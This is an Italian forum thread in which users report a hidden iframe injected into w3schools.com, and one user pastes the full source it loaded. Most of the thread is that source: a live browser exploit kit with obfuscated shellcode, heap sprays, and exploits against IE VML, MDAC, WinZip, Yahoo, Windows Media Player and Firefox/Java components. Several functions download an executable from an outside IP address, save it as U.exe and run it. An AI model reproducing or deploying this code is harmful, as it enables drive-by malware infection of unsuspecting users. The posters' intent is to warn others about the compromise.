PDA

Visualizza la versione completa : www.w3schools.com "attaccato" [no tecnico]


Vincent.Zeno
08-09-2007, 19:04
... solo per chiacchiere

fate attenzione hanno subito un'iniezione di iframe nascosto:
<iframe src='http://66.246.72.200/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

come li si avvisa?

andrea.paiola
08-09-2007, 19:06
ma che stai dicendo? :D

ahhhh w3school

ecco il sorgente dell'iframe


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns:IE>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<IE:clientCaps ID="oClientCaps" /><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<script>
var isya = 1;
var isfl = 1;
var isya2 = 1;
var issdk = 1;
</script>
<object classid="clsid:201EA564-A6F6-11D1-811D-00C04FB6BD36" id="sdk" onerror="issdk=0;"></object>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" onerror="isya2=0;" ></object>
<object classid="clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E" id="VMLRender" ></object>
<object classid="clsid:00000535-0000-0010-8000-00AA006D2EA4" id="obj" ></object>
<object classid="clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277" id="target" onerror="isya=0;"></object>
<OBJECT ID='WZFILEVIEW' WIDTH=1 HEIGHT=1 CLASSID='CLSID:A09AE68F-B14D-43ED-B713-BA413F034904'></OBJECT>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body><div id='exp'></div>

<script language="javascript">



var up_code = String.fromCharCode(37,117,57,48,57,48,37,117,57,4 8,57,48,37,117,53,52,101,98,37,117,55,53,56,98,37, 117,56,98,51,99,37,117,51,53,55,52,37,117,48,51,55 ,56,37,117,53,54,102,53,37,117,55,54,56,98,37,117, 48,51,50,48,37,117,51,51,102,53,37,117,52,57,99,57 ,37,117,97,100,52,49,37,117,100,98,51,51,37,117,48 ,102,51,54,37,117,49,52,98,101,37,117,51,56,50,56, 37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,1 00,99,98,37,117,100,97,48,51,37,117,101,98,52,48,3 7,117,51,98,101,102,37,117,55,53,100,102,37,117,53 ,101,101,55,37,117,53,101,56,98,37,117,48,51,50,52 ,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56 ,98,52,98,37,117,49,99,53,101,37,117,100,100,48,51 ,37,117,48,52,56,98,37,117,48,51,56,98,37,117,99,5 1,99,53,37,117,55,50,55,53,37,117,54,100,54,99,37, 117,54,101,54,102,37,117,54,52,50,101,37,117,54,99 ,54,99,37,117,52,51,48,48,37,117,53,99,51,97,37,11 7,50,101,53,53,37,117,55,56,54,53,37,117,48,48,54, 53,37,117,99,48,51,51,37,117,48,51,54,52,37,117,51 ,48,52,48,37,117,48,99,55,56,37,117,52,48,56,98,37 ,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,9 7,100,37,117,48,56,52,48,37,117,48,57,101,98,37,11 7,52,48,56,98,37,117,56,100,51,52,37,117,55,99,52, 48,37,117,52,48,56,98,37,117,57,53,51,99,37,117,56 ,101,98,102,37,117,48,101,52,101,37,117,101,56,101 ,99,37,117,102,102,56,52,37,117,102,102,102,102,37 ,117,101,99,56,51,37,117,56,51,48,52,37,117,50,52, 50,99,37,117,102,102,51,99,37,117,57,53,100,48,37, 117,98,102,53,48,37,117,49,97,51,54,37,117,55,48,5 0,102,37,117,54,102,101,56,37,117,102,102,102,102, 37,117,56,98,102,102,37,117,50,52,53,52,37,117,56, 100,102,99,37,117,98,97,53,50,37,117,100,98,51,51, 37,117,53,51,53,51,37,117,101,98,53,50,37,117,53,5 1,50,52,37,117,100,48,102,102,37,117,98,102,53,100 ,37,117,102,101,57,56,37,117,48,101,56,97,37,117,5 3,51,101,56,37,117,102,102,102,102,37,117,56,51,10 2,102,37,117,48,52,101,99,37,117,50,99,56,51,37,11 7,54,50,50,52,37,117,100,48,102,102,37,117,55,101, 98,102,37,117,101,50,100,56,37,117,101,56,55,51,37 ,117,102,102,52,48,37,117,102,102,102,102,37,117,1 02,102,53,50,37,117,101,56,100,48,37,117,102,102,1 00,55,37,117,102,102,102,102,37,117,55,52,54,56,37 ,117,55,48,55,52,37,117,50,102,51,97,37,117,51,54, 50,102,37,117,50,101,51,54,37,117,51,52,51,50,37,1 17,50,101,51,54,37,117,51,50,51,55,37,117,51,50,50 ,101,37,117,51,48,51,48,37,117,54,53,50,102,37,117 ,54,53,55,56,37,117,55,48,50,101,37,117,55,48,54,5 6,37,117,48,48,48,48);
var keyStr = "ABCDEFGHIJKLMNOP" + "QRSTUVWXYZabcdef" + "ghijklmnopqrstuv" + "wxyz0123456789+/" + "=";
function decode64(input)
{
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
var base64test = /[^A-Za-z0-9\+\/\=]/g;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do
{
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64)
{
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64)
{
output = output + String.fromCharCode(chr3);
}
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
}
while (i < input.length);
return output;
}

function testBrowser()
{
if ( document.defaultCharset != '' && document.defaultCharset != undefined && document.characterSet == undefined && document.body)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("MSIE")+5,3);
var browser = "MSIE";
}

if (window.opera && document.defaultCharset == undefined && document.characterSet != "" && document.characterSet != undefined && self.innerHeight)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Opera")+6,4);
var browser = "Opera";
}

if (document.defaultCharset == undefined && !window.opera && document.characterSet != "" && (self.innerHeight))
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Gecko")+6,8)+ ' ('+ window.navigator.userAgent.substr(8,3) + ')';
var browser = "Firefox";
}

if (productVersion == "")
{
var browser = window.navigator.userAgent;
}
return browser;
}

function getVersion()
{
var osversion = "";
var osplatform = "";
osversion = navigator.appVersion;
osplatform = navigator.platform
if (osplatform.search("Win32") != -1)
{
if (osversion.indexOf('Windows 95') != -1) return "95"
else if (osversion.indexOf('Windows NT 4') != -1) return "NT"
else if (osversion.indexOf('Win 9x 4.9') != -1) return "ME"
else if (osversion.indexOf('Windows 98') != -1) return "98"
else if (osversion.indexOf('SV1') != -1) return "SP2"
else if (osversion.indexOf('Windows NT 5.0') != -1) return "2K"
else if (osversion.indexOf('Windows NT 5.1') != -1) return "XP"
else if (osversion.indexOf('Windows NT 5.2') != -1) return "2K3"
}
}

function makeMemory()
{
var up_payLoad = unescape(up_code);
up_memBlock = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101))(String.fromCharCode(37,117,48,53,48,53,37,1 17,48,53,48,53));
up_memSize = 20;
up_memDump = up_memSize+up_payLoad.length;
while (up_memBlock.length<up_memDump)
{
up_memBlock+=up_memBlock;
}
up_memFill = up_memBlock.substring(0, up_memDump);
up_tempBlock = up_memBlock.substring(0, up_memBlock.length-up_memDump);
while(up_tempBlock.length+up_memDump<0x40000)
{
eval("up_tempBlock = up_tempBlock+up_tempBlock+up_memFill");
}
up_myMemory = new Array();
for (i=0;i<350;i++) up_myMemory[i] = eval("up_tempBlock + up_payLoad");
isMemory = true;
}

function findOffset(OffsetSlide, OffsetSlideSize)
{
while (OffsetSlide.length*2<OffsetSlideSize)
{
OffsetSlide+=OffsetSlide;
}
OffsetSlide=OffsetSlide.substring(0,OffsetSlideSiz e/2);
return OffsetSlide;
}

function setslice_exploit()
{
if (isMemory == false ) makeMemory();
count = 129-1;
for(i=0;i<count;i++)
try
{
var slice = eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXd Gb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));
eval(decode64('c2xpY2Uuc2V0U2xpY2UoMHg3ZmZmZmZmZSw gMHgwNTA1MDUwNSwgMHgwNTA1MDUwNSwweDA1MDUwNTA1ICk7' ));
}
catch(e){}
setTimeout("vml_exploit();",interval * 500);
}

andrea.paiola
08-09-2007, 19:12
function vml_exploit()
{
if (isMemory == false ) makeMemory();
myDiv = document.getElementById('exp');
exploit = "<v:rect style='width:120pt;height:80pt' fillcolor=\"red\" >";
exploit += "<v:recolorinfo recolorstate=\"t\" numcolors=\"97612895\">";
for (i=0;i<44;i++) exploit += "<v:recolorinfoentry tocolor=\"rgb(1,1,1)\" recolortype=\"1285\ lbcolor=\"rgb(1,1,1)\" forecolor=\"rgb(1,1,1)\" backcolor=\"rgb(1,1,1)\" fromcolor=\"rgb(1,1,1)\" lbstyle =\"32\" bitmaptype=\"3\"/> " ;
exploit += "<v/recolorinfo>";
myDiv.innerHTML = exploit;
}

function firefox_exploit()
{

firefoxPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
fill = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,39,37,117,48,56,48,48,39,41,59));
addr = 0x08000800;
b = fill;
while (b.length <= 0x400000) { b += b; }
var c = new Array();
for (var i =0; i <36 ; i++)
{
c[i] =
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
b.substring(0, 0x100000 - firefoxPay.length) + firefoxPay;
}
if (window.navigator.javaEnabled)
{
window.navigator = (addr / 2);
try { java.lang.reflect.Runtime.newInstance(java.lang.Cl ass.forName(String.fromCharCode(106,97,118,97,46,1 08,97,110,103,46,82,117,110,116,105,109,101)), 0); }
catch(e){}
}
}

function firefox1_exploit()
{
location.href = String.fromCharCode(106,97,118,97,115,99,114,105,1 12,116,58,118,111,105,100,32,40,110,101,119,32,73, 110,115,116,97,108,108,86,101,114,115,105,111,110, 40,41,41,59);
up_heapOffset = 0x12000000;
mdacPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
up_heapOffsetSize = 0x400000;
paySize = mdacPay.length * 2;
up_spraySize = up_heapOffsetSize-(paySize+0x38);
up_sprayOffset1 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,49,67,48,3 4,41,59));
up_sprayOffset1 = findOffset(up_sprayOffset1,up_spraySize);
up_sprayOffset2 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,50,48,48,3 4,41,59));
up_sprayOffset2 = findOffset(up_sprayOffset2,up_spraySize);
up_sprayOffset3 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,3 4,41,59));
up_sprayOffset3 = findOffset(up_sprayOffset3,up_spraySize);
heapOffsetB = (up_heapOffset-0x400000)/up_heapOffsetSize;
newMem = new Array();
for (i=0;i<heapOffsetB;i++)
{
newMem[i]=(i%3==0) ? up_sprayOffset1 + mdacPay: (i%3==1) ? up_sprayOffset2 + mdacPay: up_sprayOffset3 + mdacPay;
}
eval(String.fromCharCode(117,112,95,111,102,102,11 5,101,116,32,61,32,48,120,49,49,56,48,48,48,50,67, 59));
eval(String.fromCharCode(40,110,101,119,32,73,110, 115,116,97,108,108,86,101,114,115,105,111,110,41,4 6,99,111,109,112,97,114,101,84,111,40,110,101,119, 32,78,117,109,98,101,114,40,117,112,95,111,102,102 ,115,101,116,32,62,62,32,49,41,41,59));
}

function wmplayer_exploit()
{
s = unescape( String.fromCharCode(37,117,52,49,52,49,37,117,52,4 9,52,49,37,117,52,49,52,49,37,117,52,49,52,49,37,1 17,52,49,52,49,37,117,52,49,52,49,37,117,52,49,52, 49,37,117,52,49,52,49) );
do { s+=s; } while(s.length<0x0900000);s+= unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
myDiv = document.getElementById('exp');
exploit='<E'+'MB'+'ED S'+'R'+'C="---------------------'+'--------------------------'+'------------'+'-------'+'-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------'+'-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKK'+'KKLLL LAAANNN'+'NOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVW'+'WW WXXXXYYYYZZZZ0000111122223333'+'444455556666777788 889999.wmv"></EM'+'BED>';
myDiv.innerHTML = exploit;
}

Vincent.Zeno
08-09-2007, 19:13
:confused: e che roba ?

NOD 32 me lo ferma come Trojan

fred84
08-09-2007, 19:13
e meno male che non era tecnico..... :stordita:

andrea.paiola
08-09-2007, 19:14
function sdk_exploit()
{
if (isMemory == false ) makeMemory();
var tmp = "\x0A\x0A\x0A\x0A";
var tmp_size = 1044;
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
sdk.SourceUrl = tmp;
location.reload();
}


function yahoo_exploit()
{
if (isMemory == false ) makeMemory();
var target = document.createElement("object");
target.setAttribute("classid", "clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
myBuff = '\x0a';
while (myBuff.length < 5000) myBuff += '\x0a\x0a\x0a\x0a';
eval(String.fromCharCode(116,97,114,103,101,116,46 ,115,101,114)+"ver = myBuff;");
eval("target"+"."+String.fromCharCode(114,101,99,101,105,118,101,40 ,41)+";");

}


function yahoo2_exploit()
{
if (isMemory == false ) makeMemory();

var target1 = document.createElement("object");
target1.setAttribute("classid", "CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD");
var buffer = unescape("%0a0a");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0a0a");
eval();

}

function winzip_exploit()
{
if (isMemory == false ) makeMemory();
var buf = String.fromCharCode(65);
while (buf.length < 512) buf+='\x09';
eval(String.fromCharCode(87,90,70,73,76,69,86,73,6 9,87,46,67,114,101,97,116,101,78,101,119,70,111,10 8,100,101,114,70,114,111,109,78,97,109,101,40,98,1 17,102,41,59));
}



function w2k_exploit()
{
exploit = "var xml = new Ac"+"tiv"+"eX"+"Object('Mic'+'ros'+'oft.X'+'ML"+"HTTP');";
exploit += "xml.Open('GET','http://66.246.72.200/exe.php',0);xml.Send();";
exploit += "var stream = new Ac"+"ti"+"veXO"+"bj"+"ect('AD"+"ODB.Stre"+"am');stream.Mode = 3;";
exploit += "stream.Type = 1;stream.Open();stream.Write(xml.responseBody);str eam.SaveToFile('../U.exe',2); ";
payCode = escape(exploit);
pocCode = 'res://mmcndmgr.dll/pr'+'evsym12.htm#%29%3B%3C/style%3E%3Cscript%20lan'+'guage%3D%27js'+'cript%27 %3Ea%3Dnew%20ActiveXObject%28%27She'+'ll.App'+'lic ation%27%29%3B'+payCode+'a.Shel'+'lExec'+'ute%28%2 7../U.exe%27%29%3B%3C/sc'+'ript%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = pocCode;
}

function newRdsObject(o, n)
{
var r = null;
var ddd=null;
try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101,79,98,1 06,101,99,116)+"(n)") }catch(e){}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+decode 64(String.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(67,114,101,97,116,101)+decode 64(String.fromCharCode(98,50,74,113,90,87,78,48))+"(n, \"\", \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(\"\", n)") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(n, \"\")") }catch(e){}}
if (! r) {try { eval("r = o."+String.fromCharCode(71,101,116)+decode64(String.f romCharCode(98,50,74,113,90,87,78,48))+"(n)") }catch(e){}}
ddd=r;
return(ddd);
}
var mdk=0;
function Go(a)
{

var obj_exploit = newRdsObject(a,String.fromCharCode(109,115,120,109 ,108,50,46,88,77,76,72,84,84,80));
obj_exploit.open(String.fromCharCode(71,69,84),"http://66.246.72.200/exe.php",false);
eval("obj_exploit"+decode64("LnNlbmQoKTs="));
var obj_adodb = newRdsObject(a,String.fromCharCode(97,100,111,100, 98,46,115,116,114,101,97,109));
obj_adodb.type = 1;
eval(decode64("b2JqX2Fkb2RiLm9wZW4oKTs="));
eval("obj_adodb"+".Write"+"("+decode64("b2JqX2V4cGxvaXQucmVzcG9uc2VCb2R5")+");");
var fn = "C:\\\\U.exe";
eval("obj_adodb"+"."+decode64("U2F2ZVRvRmlsZQ==")+"(fn,2);");
var s = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
try { s.ShellExecute(fn); mdk=1; } catch(e) { }


}

function makePayLoad()
{
var mdacPay = new Array(
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,54,125),
String.fromCharCode(123,65,66,57,66,67,69,68,68,45 ,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,68,5 2,65,50,49,48,54,49,55,49,49,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,51,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,48,48,48,54,70,48,51,65,45 ,48,48,48,48,45,48,48,48,48,45,67,48,48,48,45,48,4 8,48,48,48,48,48,48,48,48,52,54,125),
String.fromCharCode(123,54,101,51,50,48,55,48,97,4 5,55,54,54,100,45,52,101,101,54,45,56,55,57,99,45, 100,99,49,102,97,57,49,100,50,102,99,51,125),
String.fromCharCode(123,54,52,49,52,53,49,50,66,45 ,66,57,55,56,45,52,53,49,68,45,65,48,68,56,45,70,6 7,70,68,70,51,51,69,56,51,51,67,125),
String.fromCharCode(123,55,70,53,66,55,70,54,51,45 ,70,48,54,70,45,52,51,51,49,45,56,65,50,54,45,51,5 1,57,69,48,51,67,48,65,69,51,68,125),
String.fromCharCode(123,48,54,55,50,51,69,48,57,45 ,70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,5 7,70,67,68,49,68,66,48,55,54,54,125),
String.fromCharCode(123,54,51,57,70,55,50,53,70,45 ,49,66,50,68,45,52,56,51,49,45,65,57,70,68,45,56,5 5,52,56,52,55,54,56,50,48,49,48,125),
String.fromCharCode(123,66,65,48,49,56,53,57,57,45 ,49,68,66,51,45,52,52,102,57,45,56,51,66,52,45,52, 54,49,52,53,52,67,56,52,66,70,56,125),
String.fromCharCode(123,68,48,67,48,55,68,53,54,45 ,55,67,54,57,45,52,51,70,49,45,66,52,65,48,45,50,5 3,70,53,65,49,49,70,65,66,49,57,125),
String.fromCharCode(123,69,56,67,67,67,68,68,70,45 ,67,65,50,56,45,52,57,54,98,45,66,48,53,48,45,54,6 7,48,55,67,57,54,50,52,55,54,66,125),
String.fromCharCode(123,66,68,57,54,67,53,53,54,45 ,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,4 8,67,48,52,70,67,50,57,69,51,48,125),null);
return mdacPay;
}


function mdac_exploit()
{
var i = 0;
var mdacPay = makePayLoad();
while (mdacPay[i])
{
var a = null;
if (mdacPay[i].substring(0,1) == "{")
{
a = document.createElement(decode64(String.fromCharCod e(98,50,74,113,90,87,78,48)));
